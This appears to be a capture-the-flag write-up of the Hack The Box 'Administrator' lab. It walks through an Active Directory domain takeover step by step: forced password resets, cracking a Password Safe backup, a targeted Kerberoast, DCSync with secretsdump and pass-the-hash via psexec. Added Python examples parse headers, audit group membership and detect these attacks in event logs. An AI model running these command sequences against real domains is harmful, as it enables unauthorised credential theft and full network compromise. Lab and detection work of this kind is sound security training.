Machine Information: Administrator is a medium-difficulty Windows machine designed around a complete domain compromise scenario, where credentials for a low-privileged user are provided.
IP: 10.10.11.42
Difficulty: Medium
As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account:
Username: Olivia
Password: ichliebedich
Nmap
nmap -T4 -p- -A -v 10.10.11.42 nmap/nmap_
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-15 11:39:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49159/tcp open msrpc Microsoft Windows RPC
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
59359/tcp open msrpc Microsoft Windows RPC
65504/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
65515/tcp open msrpc Microsoft Windows RPC
65520/tcp open msrpc Microsoft Windows RPC
65523/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-07-15T11:40:12
|_ start_date: N/A
|_clock-skew: 6h59m58s
Looking at the nmap scan, this is an Active Directory domain controller: port 88 (Kerberos) is open along with LDAP on 389/636 and the global catalog on 3268/3269. Other interesting open ports include FTP (21), SMB (445) and WinRM (5985). Note also the reported clock skew of almost seven hours; Kerberos tolerates only a few minutes of skew, so this matters later. Since we already have credentials, the first thing I like to check is whether they work against FTP, SMB or WinRM.
SMB
smbmap -H 10.10.11.42 -u 'olivia' -p 'ichliebedich'
SMBMap shows that this user has no access to any share apart from the default ones. It also confirms that the credentials are valid, since read access to the default shares requires a successful authentication. The same check can be done with netexec.
FTP
Let’s check if we can access the FTP with the provided credentials.
ftp 10.10.11.42
WinRM
cme winrm 10.10.11.42 -u 'olivia' -p 'ichliebedich'
Logging in With Evil-Winrm
evil-winrm -i 10.10.11.42 -u olivia -p "ichliebedich"
Now that we have a shell on the machine, we can run a few commands to enumerate the domain, including this user's privileges and the accounts that exist. Running net user gives us a list of possible users.
As we already have valid credentials, let's enumerate the domain with LDAPDomainDump and BloodHound. Usually BloodHound alone is sufficient, but I like to use ldapdomaindump as well because it presents the group structure, and which users belong to each group, in a table.
LDAPDomainDump
ldapdomaindump ldap://10.10.11.42 -u 'administrator.htb\olivia' -p 'ichliebedich'
To read the dump, open the 'Domain Users By Group' page to see the members of the domain along with the groups they belong to. This gives an overview of the domain and of the next attack paths we could attempt, and it shows which members are high-value targets to focus on in BloodHound. Share Moderators is one of the non-standard groups, and Benjamin is its member.
It's always good practice to look at every file ldapdomaindump produces and see what information it provides. For this machine, the domain users by group page is enough.
BloodHound
Now that we have an idea of the domain, let's run BloodHound to see whether our current user, Olivia, can be used to move forward within the domain. I ran SharpHound by uploading the binary through the WinRM session. Alternatively, since we already have valid credentials, bloodhound-python can collect the same data remotely.
Running SharpHound
upload sp.exe
./sp.exe -c all
download bloodhound_filename.zip
Upload the collected data to BloodHound and let's enumerate outward from the user Olivia.
Olivia has GenericWrite over the user Michael, who in turn has ForceChangePassword over the user Benjamin. Benjamin is a member of the Share Moderators group, which we can probably use to access the FTP server.
Abusing Rights
Olivia's GenericWrite over Michael lets us change Michael's password.
net rpc password "Michael" "P@ssword123" -U administrator.htb/"Olivia"%"ichliebedich" -S 10.10.11.42
Michael can change the password of Benjamin who, if we recall, is part of the 'Share Moderators' group.
net rpc password "Benjamin" "P@ssword123" -U administrator.htb/"Michael"%"P@ssword123" -S 10.10.11.42
Every time we gain access to a new user, it is good practice to re-enumerate the services that user can reach, including FTP and SMB in this case. As we can see, Benjamin can log in to the FTP service.
Logging into FTP as Benjamin
Logging into FTP as Benjamin reveals a backup database file. Before downloading it over FTP, switch the transfer mode from ASCII to binary so the file is not corrupted.
ftp 10.10.11.42
We can use the file utility to learn more about the file type. It reports a Password Safe v3 database file.
Cracking Psafe DB
Password Safe is a password manager, so the database may contain stored credentials. To open it we need to recover its master password; Hashcat has a module (5200) for Password Safe v3 databases.
hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt -O
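The file utility recognises a Password Safe v3 database by the fixed header at the start of the file, and the same header carries the key-derivation parameters that decide how expensive each master-password guess is. The following Python is an added example, not code from this write-up or from the Password Safe project: it parses that header (the TAG, SALT, ITER, H(P'), B1..B4 and IV fields of the V3 format) from a constructed sample and reports the iteration count, which is what a defender reviewing a backup of such a file would want to know. The SAMPLE_HEADER bytes and the kdf_assessment wording are assumptions made for the example.

```python
import struct

# Fixed header of a Password Safe V3 file, per the V3 format description:
# TAG(4) SALT(32) ITER(4, little-endian) H(P')(32) B1..B4(4 x 16) IV(16).
MAGIC = b"PWS3"
HEADER_LEN = 4 + 32 + 4 + 32 + 16 * 4 + 16  # 152 bytes
SPEC_MIN_ITER = 2048  # smallest iteration count the V3 specification permits


def is_psafe3(blob: bytes) -> bool:
    """The same test `file` applies: the data starts with the PWS3 tag."""
    return blob[:4] == MAGIC


def parse_psafe3_header(blob: bytes) -> dict:
    """Return the key-derivation parameters from the header; the encrypted body is untouched."""
    if not is_psafe3(blob):
        raise ValueError("not a Password Safe V3 database (missing PWS3 tag)")
    if len(blob) < HEADER_LEN:
        raise ValueError("truncated header")
    (iterations,) = struct.unpack("<I", blob[36:40])
    return {
        "salt": blob[4:36].hex(),
        "iterations": iterations,
        "stretched_key_hash": blob[40:72].hex(),  # H(P'), what a cracker compares against
        "iv": blob[136:152].hex(),
    }


def kdf_assessment(iterations: int) -> str:
    """Rough triage of how much the master password relies on the KDF cost (wording is an assumption)."""
    if iterations < SPEC_MIN_ITER:
        return "below the V3 minimum: file is non-conformant or has been tampered with"
    if iterations == SPEC_MIN_ITER:
        return "spec minimum: each guess costs about 2048 SHA-256 calls, so a weak master password falls quickly offline"
    return f"{iterations} iterations: {iterations // SPEC_MIN_ITER}x the spec minimum"


# Constructed header for the example: all-zero salt, hash and IV, 2048 iterations.
SAMPLE_HEADER = (
    MAGIC
    + bytes(32)                        # SALT
    + struct.pack("<I", SPEC_MIN_ITER)  # ITER
    + bytes(32)                        # H(P')
    + bytes(64)                        # B1..B4
    + bytes(16)                        # IV
)

if __name__ == "__main__":
    info = parse_psafe3_header(SAMPLE_HEADER)
    print(info["iterations"], kdf_assessment(info["iterations"]))
```

On a real file the interesting number is the iteration count: a backup written by an old client at the specification minimum gives an offline attacker far more guesses per second than one written with a modern, higher setting, which is the property the hashcat step above exploits.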
Opening Password Safe
To open the Password safe, you can download the password safe utility.
sudo apt install passwordsafe
# To open pwsafe
pwsafe
Enter the master password cracked using hashcat to open the password safe.
Being good enumerators, we already know that the Alexander account is disabled; you can confirm it in the ldapdomaindump output. Emily and Emma are the next targets to focus on. Since this was a backup of the password safe, users may have changed their passwords since it was taken, so the first step is to confirm that the recovered credentials are still valid. If they are, we check in BloodHound how these users let us move forward.
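Two of the checks made above from the ldapdomaindump output, spotting the non-standard Share Moderators group and noticing that Alexander is disabled, are the kind of review a domain owner should be running on a schedule. The following Python is an added example and not part of this write-up or of the ldapdomaindump project: it runs those checks over records shaped like the LDAP attributes ldapdomaindump reads (cn, member DNs, userAccountControl). The records are constructed for the example; only Share Moderators with member Benjamin and the disabled Alexander account reflect the write-up, and the "Legacy App Owners" group, the DEFAULT_GROUPS list and the exact userAccountControl values are assumptions.

```python
ACCOUNTDISABLE = 0x0002  # userAccountControl flag set on disabled accounts

# Groups present in a default domain (assumed list); anything else is custom and worth reviewing.
DEFAULT_GROUPS = {
    "Administrators", "Users", "Guests", "Domain Admins", "Domain Users", "Domain Computers",
    "Domain Controllers", "Domain Guests", "Enterprise Admins", "Schema Admins",
    "Group Policy Creator Owners", "Protected Users", "Remote Management Users",
    "Remote Desktop Users", "Backup Operators", "Account Operators", "Server Operators",
    "Print Operators", "DnsAdmins", "Read-only Domain Controllers", "Cert Publishers",
    "Key Admins", "Enterprise Key Admins", "RAS and IAS Servers",
    "Allowed RODC Password Replication Group", "Denied RODC Password Replication Group",
}


def rdn(dn: str) -> str:
    """First RDN value of a DN: 'CN=Benjamin,CN=Users,DC=...' -> 'Benjamin' (no escaped-comma handling)."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def disabled_accounts(users) -> set:
    """Lower-cased sAMAccountNames whose userAccountControl has the ACCOUNTDISABLE bit set."""
    return {u["sAMAccountName"].lower() for u in users if u["userAccountControl"] & ACCOUNTDISABLE}


def custom_groups(groups) -> dict:
    """Non-default groups mapped to their member names; empty groups are skipped."""
    return {
        g["cn"]: [rdn(m) for m in g["member"]]
        for g in groups
        if g["cn"] not in DEFAULT_GROUPS and g["member"]
    }


def membership_report(groups, users) -> list:
    """Rows of (group, member, status) for every custom group, flagging disabled members."""
    disabled = disabled_accounts(users)
    rows = []
    for group, members in custom_groups(groups).items():
        for member in members:
            status = "disabled" if member.lower() in disabled else "enabled"
            rows.append((group, member, status))
    return rows


# Constructed records standing in for domain_groups / domain_users output.
GROUPS = [
    {"cn": "Domain Admins", "member": ["CN=Administrator,CN=Users,DC=administrator,DC=htb"]},
    {"cn": "Share Moderators", "member": ["CN=Benjamin,CN=Users,DC=administrator,DC=htb"]},
    {"cn": "Legacy App Owners", "member": ["CN=Alexander,CN=Users,DC=administrator,DC=htb"]},  # constructed
    {"cn": "Empty Custom Group", "member": []},  # constructed
]
USERS = [
    {"sAMAccountName": "administrator", "userAccountControl": 0x10200},  # NORMAL + DONT_EXPIRE_PASSWORD
    {"sAMAccountName": "benjamin", "userAccountControl": 0x200},         # NORMAL_ACCOUNT
    {"sAMAccountName": "alexander", "userAccountControl": 0x202},        # NORMAL_ACCOUNT + ACCOUNTDISABLE
]

if __name__ == "__main__":
    for group, member, status in membership_report(GROUPS, USERS):
        print(f"{group:20} {member:15} {status}")
```

A disabled account sitting in a custom group is usually stale access that should be cleaned up; a live account in a custom group with rights over shares or services is exactly the kind of lateral-movement foothold the write-up uses Benjamin for.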
Emily has GenericWrite over the user Ethan, who holds DCSync rights. GenericWrite lets us run a targeted Kerberoast attack, which returns a service ticket hash that we can attempt to crack. Because of the clock skew seen in the nmap scan, you may need to synchronise your system clock with the DC using ntpdate before the Kerberos requests succeed.
./kerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQ[Redacted]'
Using hashcat module 13100, we can crack Ethan's password with the rockyou.txt wordlist.
hashcat -m 13100 ethan.txt /usr/share/wordlists/rockyou.txt -O
SecretsDump Domain
As Ethan has DCSync rights, we can use the cracked password to dump all the secrets from the domain, including the Administrator NTLM hash.
secretsdump.py administrator.htb/ethan:'limp[Redacted]'@10.10.11.42
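Each of the three abuse steps in this chain (the password resets through GenericWrite and ForceChangePassword, the targeted Kerberoast that first writes an SPN onto Ethan and then requests an RC4 service ticket, and the DCSync performed with Ethan's replication rights) leaves a distinct footprint in the domain controller's Security log. The following Python is an added example, not part of this write-up: it runs simple detection checks over constructed event records whose field names follow the Windows Security event schema for events 4724, 5136, 4769 and 4662. The events are made up to mirror the chain described above; the HELPDESK_ACCOUNTS and REPLICATION_ACCOUNTS allowlists and the example SPN value are assumptions.

```python
# Extended rights used by directory replication. A 4662 carrying one of these from a
# principal that is not a domain controller is the classic DCSync signal.
DCSYNC_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumed allowlists: accounts that legitimately reset other users' passwords, and the
# machine accounts that legitimately replicate (the DC itself).
HELPDESK_ACCOUNTS = {"helpdesk"}
REPLICATION_ACCOUNTS = {"dc$"}

RC4_HMAC = "0x17"  # TicketEncryptionType for RC4; AES tickets show 0x11 / 0x12


def check_password_reset(ev):
    """4724: another account's password reset by a principal outside the helpdesk allowlist."""
    subj, target = ev["SubjectUserName"].lower(), ev["TargetUserName"].lower()
    if subj in HELPDESK_ACCOUNTS or subj == target:
        return None
    return f"4724 password reset of {target} by {subj} (possible GenericWrite/ForceChangePassword abuse)"


def check_spn_write(ev):
    """5136: servicePrincipalName written on an object by a user account."""
    if ev.get("AttributeLDAPDisplayName") != "servicePrincipalName":
        return None
    subj = ev["SubjectUserName"].lower()
    if subj in HELPDESK_ACCOUNTS or subj.endswith("$"):
        return None
    return f"5136 SPN {ev['AttributeValue']!r} written on {ev['ObjectDN']} by {subj} (targeted Kerberoast setup)"


def check_rc4_tgs(ev):
    """4769: RC4 service ticket for an SPN held by a user account (the roastable case)."""
    if ev.get("TicketEncryptionType") != RC4_HMAC:
        return None
    svc = ev["ServiceName"].lower()
    if svc.endswith("$") or svc == "krbtgt":
        return None  # machine accounts and the TGT are not what a Kerberoast targets
    return f"4769 RC4 service ticket for {svc} requested by {ev['TargetUserName']}"


def check_dcsync(ev):
    """4662: replication extended rights exercised by a principal that is not a DC."""
    subj = ev["SubjectUserName"]
    if subj.lower() in REPLICATION_ACCOUNTS:
        return None
    props = ev.get("Properties", "").lower()
    hits = [name for guid, name in DCSYNC_GUIDS.items() if guid in props]
    if not hits:
        return None
    return f"4662 {', '.join(hits)} by {subj} (DCSync)"


CHECKS = {4724: check_password_reset, 5136: check_spn_write, 4769: check_rc4_tgs, 4662: check_dcsync}


def triage(events):
    """Run the matching check for each event and collect the findings in log order."""
    findings = []
    for ev in events:
        check = CHECKS.get(ev["EventID"])
        finding = check(ev) if check else None
        if finding:
            findings.append(finding)
    return findings


# Constructed events mirroring the chain in the write-up, plus benign look-alikes.
SAMPLE_EVENTS = [
    {"EventID": 4724, "SubjectUserName": "olivia", "TargetUserName": "michael"},
    {"EventID": 4724, "SubjectUserName": "michael", "TargetUserName": "benjamin"},
    {"EventID": 4724, "SubjectUserName": "helpdesk", "TargetUserName": "emma"},  # allowlisted
    {"EventID": 5136, "SubjectUserName": "emily", "ObjectDN": "CN=Ethan,CN=Users,DC=administrator,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "HTTP/example-spn"},  # SPN value constructed
    {"EventID": 4769, "TargetUserName": "emily@ADMINISTRATOR.HTB", "ServiceName": "ethan", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "olivia@ADMINISTRATOR.HTB", "ServiceName": "DC$", "TicketEncryptionType": "0x12"},  # benign AES
    {"EventID": 4662, "SubjectUserName": "ethan",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "DC$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},  # normal replication
]

if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print(line)
```

Events 5136 and 4662 are only written when a SACL on the relevant objects requests auditing of directory writes and control-access operations, so the SPN-write and DCSync checks depend on that audit configuration being in place on the DC; 4724 and 4769 come from the default account-management and Kerberos audit categories.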
Now you can use the Administrator NTLM hash to log in to the machine with a pass-the-hash tool. In this case, I used psexec.
psexec.py administrator@10.10.11.42 -hashes ':3dc[Redacted]'
You can go to the administrator’s desktop to grab the root flag. If you find this blog useful, please consider giving respect on Hack The Box.